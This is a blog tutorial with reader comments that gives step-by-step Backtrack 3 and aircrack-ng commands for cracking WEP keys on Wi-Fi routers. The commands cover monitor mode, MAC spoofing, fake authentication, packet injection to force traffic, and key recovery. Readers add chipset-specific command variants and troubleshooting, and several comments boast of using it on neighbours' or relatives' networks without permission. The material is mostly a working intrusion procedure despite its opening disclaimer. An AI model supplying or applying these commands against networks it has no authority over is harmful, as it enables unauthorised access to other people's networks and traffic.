Standard Disclaimer: This article is provided for informational purposes only. thew0rd.com and its affiliates accept no liability for providing this information. Please only use to test configurations on your own equipment. Accessing WIFI networks that do not belong to you is ILLEGAL.
This article will explan how to crack 64bit and 128bit WEP on many WIFI access points and routers using Backtrack, a live linux distribution. Your mileage may very. The basic theory is that we want to connect to an Access Point using WEP Encryption, but we do not know the key. We will attack the wifi router, making it generate packets for our cracking effort, finally cracking the WEP key. I have tested this technique on an IBM Thinkpad x60 and Acer 5672 and the WIFI Chipset in those machines work for sure.
Requirements:
- Backtrack 3 on CD or USB
- Computer with compatible 802.11 wireless card
- Wireless Access point or WIFI Router using WEP encryption
I will assume that you have downloaded and booted into Backtrack 3. If you haven’t figured that part out, you probably shouldn’t be trying to crack WEP keys. Once Backtrack is loaded, open a shell and do the following:
Preparing The WIFI Card
First we must enable “Monitor Mode” on the wifi card. If using the Intel® PRO/Wireless 3945ABG chipset issue the following commands:
modprobe -r iwl3945
modprobe ipwraw
The above commands will enable monitor mode on the wireless chipset in your computer. Next we must stop your WIFI card:
iwconfig
Take note of your wireless adapter’s interface name. Then stop the adapter by issuing:
airmon-ng stop [device]
Then:
ifconfig down [interface]
Now we must change the MAC address of the adapter:
macchanger --mac 00:11:22:33:44:66 [device]
Its now time to start the card in monitor mode by doing:
airmon-ng start [device]
Attacking The Target
It is now time to locate a suitable WEP enabled network to work with:
airodump-ng [device]
Be sure to note the MAC address (BSSID), channel (CH) and name (ESSID) of the target network. Now we must start collecting data from the WIFI access point for the attack:
airodump-ng -c [channel] -w [network.out] --bssid [bssid] [device]
The above command will output data collected to the file: network.out. This file will be fed into the WEP Crack program when we are ready to crack the WEP key.
Open another shell and leave the previous command running. Now we need to generate some fake packets to the access point to speed up the data output. Test the access point by issuing the following command:
aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]
If this command is successful we will now generate many packets on the target network so that we can crack the KEY. Type:
airplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]
This will force the access point to send out a bunch of packets which we can then use to crack the WEP key. Check your aerodump-ng shell and you should see the “data” section filling up with packets.
After about 10,000-20,000 you can begin cracking the WEP key. If there are no other hosts on the target access point generating packets, you can try:
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]
Once you have enough packets, you begin the crack:
aircrack-ng -n 128 -b [bssid] [filename]-01.cap
The “-n 128″ signifies a 128-bit WEP key. If cracking fails, try a 64-bit key by changing the value of N to 64.
Once the crack is successful you will be left with the KEY! Remove the : from the output and there is your key. So there you have it.
You can use these techniques to demonstrate to others why using WEP is a bad idea. I suggest you use WPA2 encryption on your wireless networks. Goodluck!
Follow me on Twitter 
Thanks Maz! You’re a lifesaver. I spent a while trying to do this with russix and I couldn’t get it. (Crazy mother-in-law is too cheap to buy internet, she moved, and her new place only has encrypted signals…luckily WEP)
or you could just buy your web access and not be fucking people over for bandwidth etc.
Good tut. Next you might want to share with your readers about packet injection and Kismet for sniffing. I don’t know if they bundle Kismet with BT3 now but I know it was in BT2. Thanks
There is no macconfig?
macconfig: command not found
The command is macchanger… Read the tutorial :)
Before attacking the others maybe you should have read the post below it :)
@Registered99 Thanks for pointing out the mistake, the actual command is macchanger and I’m updating the post as I write this. Goodluck!
Thanks a lot. I don’t really even plan on using this, but it was very informative and clear. Thanks for the effort.
I personally do not worry if someone hack into my route go online. What worry me are when the intentions are further, break into my desktop or use my connection do bad things which would got me a surprise knock on the door by FBI. This is a darn good reason I remain connect with troublesome hard wired or the stick to old router b version.
just wondering what are your thoughts on hiding/not broadcasting the SSID…decently secure or no?
@justgeig if there are active clients on an AP with a hidden SSID, you can usually see it when running airodump-ng by comparing the MAC of the hidden AP with the MAC on packet captures. So generally, it doesn’t offer much more security. Might just be a speed bump in some situations.
aircrack-ng also has the PTW algorithm attack, which needs far less IVs to successfully decrypt a WEP key. You can invoke it using the ‘-z’ switch with aircrack-ng. I’ve cracked a 128-bit WEP key with only about 40000 IVs.
i have done exactly as you told my wifi chipset is Intel® PRO/Wireless 3945ABG.
problem is after i use
airplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]
i get no packets from my access point. then i use:
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]
after this i get many packets but like 50000 packets has only 1 IV.
the access point im testing on is Dynalink_Datron.
Hope someone can help
Having trouble cracking wep key at my house. After performing this command aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device] the output for dest mac is ff:ff:ff:ff:ff:ff, but according to your tutorial the dest mac is the fake mac. So when I try to decrypt the packets it fails looking for keys and says try with 5000 IVs
@jones hey, check out the following site for more information about Interactive Packet Replay: http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay
Hopefully that will give you a little more background and assist you in your efforts. Goodluck!
great tutorial, scary
“aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]”
If you use interactive packet replay, wouldn’t you need to capture a lot more than just 20,000 packets in order to successfully attempt to crack? As far as I know what you’ll be capturing wont be ARP packets, so the PWT method will not work for you. You’ll probably need to capture about 1,500,000 IVS before having a good chance of getting the key. Or am I mistaken?
hey greeat tut just one question when i run the
ifconfig down [wifi0] command i get error something like interface not found, but when i run airmon-ng stop [device] it says interface is wifi0 so im pretty sure its the wright interface, btw interface and device are the same thing on my machine. oh and last thing how do you get out of monitor mode?
This tutorial is wonderful and worked for me!
This line however needed the following changes to work for me.
before:
airodump-ng -c [channel] -w [network.out] –bssid [bssid] [device]
after:
airodump-ng -c [channel] -w [network.out] -–bssid [bssid] [device]
great tutorial! what would needed to be modified in the code to get it to work with an atheros chipset?
i cant quite figure it out
for atheros based chipsets use ath_pci in place of the numbers for the modprobe command. I also had to remove the -r to get it to load- BUT I have no idea what I’m doing yet
Hope this helps someone
this tutorial helped me alot – at was the basis for me learning bt3. However Some of the above post did not work for me. I am using an Atheros chipset, and some things had to be changed. Hope this helps some one
modprobe ath_pci
modprobe ipwraw
iwconfig
airmon-ng stop ath0
ifconfig wifi0 down
macchanger –mac 00:11:22:33:44:66 wifi0
airmon-ng start wifi0
airodump-ng ath0
gives available routers
******** cd /mnt/hda2/
can do this to change the place to save the data
airodump-ng -c 6 -w network.out –bssid 00:21:21:21:21:21 ath0
collects shit
aireplay-ng -1 0 -a 00:21:21:21:21:21 -h 00:11:22:33:44:66 -e smokers suck ath0
must play around with this to get it on the same channel
should get:
15:56:18 Association successful :-) (AID: 1)
aireplay-ng -3 -b 00:21:21:21:21:21 -h 00:11:22:33:44:66 ath0
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:21:21:21:21:21 -h 00:11:22:33:44:66 ath0
cd /mnt/hda2 <- Used this to re-locate to the directory with the file
aircrack-ng -n 128 -b 00:21:21:21:21:21 network.out-01.cap
can ill use my wifi wireless network kaart that in my laptop ??
Hi there
I am new to Wifi and linux. I have just been on amazone to order books so I can read about linux. They will be here in some days, but I can’t wait for some days.
I im trying this tutorial and I get an error:
bt ~ # modprobe -r iwl4965
bt ~ # modprobe ipwraw
bt ~ # iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
bt ~ #
If I run “modprobe -r iwl4965″ then iwcanfic can’t find my wireless adapter and I can’t fint the interface name.
What do I miss here or doing wrong?
Thanks
Nedad
Take note of your wireless adapter’s interface name. Then stop the adapter by issuing:
airmon-ng down [interface]
what is the interface
i all i can find is the divice name.
i get the error ‘host name lookup failure’
i think this is why my #data is staying at zero and beacon is at like 30000
i got it all working i cant active attack, thanks for the great tutorial
great tut. i have also question, or 3 problems? 1.)well after this step : aireplay-ng -3 -b bssid -h 00:11:22:33:44:55 (device) there is a lot of read packets (100 000), but there is no ARP and ACKs requests, and data is 0, or just a few maybe 3 or 4 or 4 etc.
so what’s problem?
2)also, a lot of times this step don’t work: aireplay-ng -10 -a bssid -h 00:11:22:33:44:55 -e essid (device), after that there is no Authentication successful and Association successful. 3.problem is next. after this aireplay-ng -3 -b bssid -h 00:11:22:33:44:55 (device), there is no ARP and ACKs so, with another laptop i tried to connect on the same secure network, and then started ARP and ACK..but there is no data rising, only when i tried to conect with another laptop, then data rising, but when i stop, also Data stops. and after maybe 50 000 od IV’s i can’t crack becouse that+s not enough of IV’s. have you any solution what can i do?
one more thing- there is no problem with wirelles card, becouse, i tried with 5 different!!
how to increase the speed of injecting packets ??
the #data colums doesnt rise very fast after injecting packets … it would take around 4 hours to rise to about 10000 packets…how to make it risee faster ??
i am using an intel3495 card ….
im getting a msg saying
Fwrite(packet data) failed no more space on device
fwrite(packet filter) failed no more space on device
while collecting packets after while it will corrupt packets collected???.. help how do i relocate where data is sent??
Can i run BackTrack 3 in windows Vista? please tell me how. Thanks.
@guest no. And the fact that you asked that question really shows how little you know. You should search google, read, and learn more about what an operating system is and other computer basics before you try to go and crack WEP. You are obviously not going to crack WEP for any legitimate security purpose.
Nice job on the tutorial. I am having some trouble with the airmon-ng and airodump-ng. The apps start but are not finding any data and seem unstable. The first few times they did find some networks. But now they don’t find anything. I have the same Centrino wireless card cited in the tutorial. Kismet is working fine and finding many networks. Any help would be appreciated. Z.
Nice tutorial. Have tried this before but my Laptop’s wireless card is not compatible. Will be purchasing a new card soon as this is a neat trick to show our clients.
For all of you people asking about ifconfig, it’s not
ifconfig down [interface]
is
ifconfig [interface] down
have a good day ;)
GReat tut!
But it doesnt stop scanning the wirieless networks!
HelP!
thx m8, great tutorial, although I had some problems with it after few hours playing with it I succeeded in hacking WEP key of desired network…once again many thx 2 u and browncardboard how wrote version for my card, based on Atheros chipset.
Godafather
to stop the scaning just press:
Ctrl + C keys that´s for stop any activity in that shell console window. and…
and… Maz… Thanks for everything i didnt tried to type the modprobe´s commands. and still didnt..
What Backtrack version specifcally? 3 beta? or 3 final?
I’m asking because I downloaded 3 final from the link you provided for CD version and when it boots it’s not live, its just a terminal, and it works fine until I have to open a new shell, which I can’t or don’t know how to do.
So in essence I’m wondering if my download is corrupt or if I downloaded the wrong version.
Hi everyone, i have big question, im gonna buy PCI Wirless Card (Belkin F5D900 Wirless G+ MIMO Desktop Pci Card) but that question is card will be compatibile with BackTrack3 for Aircracking. Does anyone used that kind of card before?
Thats card is propably on RT61 chipset. Im not sure, thx for any answers.
Hi all, I’m trying to inject packets for increase de data captures (for crack the wep key), however the number ofd data never increase, I tried using the aireplay-ng command mentioned above with 3 APs (no mac filtering) and it didn’t work.
Thanks for your help
This is a decent tutorial except that there are 2 typos in the listed commands to watch out for:
“ifconfig down [interface]”
should be:
“ifconfig [interface] down”
“airplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]”
should be:
“aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]”
I am also having no luck with both methods of aireplay in getting packets.
ok i understand the program and had no problem using it on my desktop but having a huge issue with it on my laptop…im guessing that my Intel(R) Wireless Wifi Link 5100 chipset is not compatible unless there is something i can do to fix it. Can someone recommend a external wireless card that i can use in my express card slot on my laptop, if so i would appreciate if you would drop me an email at generalj14@yahoo.com
Huh. I don’t know what’s going on.
I took this screenshot at a couple hundred thousand IV’s. I let the program run further, and was at several million IV’s and aircrack would still fail to deliver me my WEP key.
I must say, I’m pretty damn impressed with WEP encryption if it takes several days and billions of packets for Aircrack to deliver me my key.
http://i43.tinypic.com/vpjeb8.jpg
i got stuck at:
aireplay-ng -1 0 -a 00:00:00:00:00:00 -h 00:11:22:33:44:66 -e XXXXX ath0
response:
18:13:29 Waiting for beacon frame (BSSID: 00:00:00:00:00:00) on channel 1
For the given BSSID “00:00:00:00:00:00″, there is an ESSID mismatch!
Found ESSID “XXXX’X” vs. specified ESSID “XXXXX”
Using the given one, double check it to be sure its correct!
18:13:30 ath0 is on channel 1, but the AP uses channel 9
any idea on what to do?
Worked like a charm, took me less than a minute to crack my neighbors WEP, now I can cancel my Internet service. Hehehe…
hi there.
Thanks for this tutorial great job.
However it is a great tutorial, i would have few problems, and i would really appreciate if someone could help me.
First of all there are few type mistake in the tutorial.
It says ifconfig down interface but the correct is ifconfig interface down.
No im not smart ass, but it took me 2 hours to reealize thats why i got the error message:)
On the other hand for some reason i cannot capture packages. I mean, i can see the traffic, but when i try to generate traffic there, basically nothing happen. Everything seems working fine but the packages dont seem like growing. does anyone can help me regarding this?
I have tried this command : aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]
it is successful but when i try to use this: airplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]
OOOOORRRRRR this
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]
seems like the numbers are growing but not the IVs data is keep counting paintfully slow. like 2 value up in an hour.
It would be appreciated if someone could help me what to do and how to do.
Cheers
gomika
hey people! you all are talking about BT3 wep hack but if after this step : aireplay-ng -3 -b bssid -h 00:11:22:33:44:55 (device) there is a lot of read packets (100 000), but there is no ARP and ACKs requests, and data is 0 you will not be able to hack any wep
Any Answer????
Maz said,
11-16-2008 in 13:26:17 at 208.120.217.126 @guest
…. You are obviously not going to crack WEP for any legitimate security purpose.
————————————————–
What do you think most people do with this tutorial? 99% chance that people crack WEP for illegal purpose… I don’t understand your reasoning!
everything good and helpful when the router has one name (demo)what should i do when the router has two names (one demo)?the aireplay-ng command does nothing if the router has two names!
Hi commasbug,
Can you help me with this ?
I have no ARP. I receiving many packets and data , but the ARP is still 0
thx
Nice tutorial, very helful for a newb like me.
Just got one problem/question. Upon cracking the key I get this:
[01:01:01:01:01]
How do I translate this to the actual WEP key?
Hmm, disregard that comment. It’s right there…. Hehehe
I have the same problem as above:
Can you help me with this ?
I have no ARP. I receiving many packets and data , but the ARP is still 0
thx
I have an intel Pro/wireless 2915abg in a dell latitude D610 and when I typr modeprobe -r iwl2195 I get Module not found.
runnin an atheros ar5b91 in a gateway T-6330u & BT3 live(CD) .. no adapter listed in BT’s wireless asst.
assume driver issue considerin BT4 beta or VM option… any suggestions? please & thank you!
i like this
This is great and all but people shouldn’t be screwing other people out of bandwidth like that!
i am using Atheros AR9285 802.11b/nWifi Adapter- Windows 7.. the wireless security in my location is unsecured. how can i crack the password
Lenx, You could start by reading the article above. Next you could learn Linux. Thirdly, if there is “unsecured wireless security” in your location as you state above, there is nothing to crack, as it’s unsecured. Remember, it’s illegal to use someone’s wireless without their permission.
I suggest you just give up and go do something else.
Actually I see you are in Kuala Lumpur, Malaysia. I’m not sure what the penalties are for stealing WIFI in Malaysia, but I could guess they are extreme.
hello everyone i have backtrack 4 and what i found is that you do not need to do some of the codes like putting it in monitor mode and it has to be a atheros or an Intel pro something something. it can be any wireless network adapter that you have still some codes does the same thing all you need is to download backtrack 4 from torrent or anywhere else and do what you have to do to make the evolution of hackers grow.
Gee, thanks for stealing my entire post word for word on your site. Fucking idiot can’t even get the images to display properly. Asshole.
i am using Atheros AR9285 Wireless Network Adapter, but it is not displaying when i runned airmon-ng! – there is no wifi interfaces
PS: i have bt3 on CD, maybe on bt4 it will work normally…
PPS: Execute me for my Englizh
Is it possible for those of us that get to the final step, that we are not recieving any data because the wireless router/AP we are accessing is actually not sending out any data? I.e there is nobody connected to it?
For example if you are trying to connect to a company and nobody is actually using the wifi at the time you try crack it?
Hi,
this is a very easy question for you i think, but i cannot find an answer for it.
Is it possible to get my EEE PC 1005PE with Atheros ar9285 into monitor mode?
Thanks
West
http://img838.imageshack.us/img838/1324/btrackacksreprt4.jpg
what i should do?
sir i m using windos xp system with virtualbox i have cd of bt-3 which i got with sky dude router now i have to burn that c\d or not.2nd i try to load but it stoped in two lines that start up n asking shall so now what i have to do,n how i will get router interface is USB2.0 mini USB so i have u this name.
i m new in this field n i dont have too much knowlege of comp but i m learning threw friends like u.thanks.
i hop i will get reply soon.
thank uuuuuuuuuuuuuuuuu
Dear sir
pleses help me??
Pleses send the software for spoonwep hack For WEPWPA WPA2
and he server attach for web site software
pleses send by email
best regards
Mohammad
Here is an article that explains WEP cracking thoroughly:
I hacked my secure wireless network here’s how it’s done – TECH_BLORGE_com
http://tech.blorge.com/Structure:%20/2007/02/06/i-hacked-my-wireless-network/
P/S: Maz, sorry for insulting.
Hi,
this is a very easy question for you i think, but i cannot find an answer for it.
Is it possible to get my EEE PC 1005PE with Atheros ar9285 into monitor mode?
Thanks
West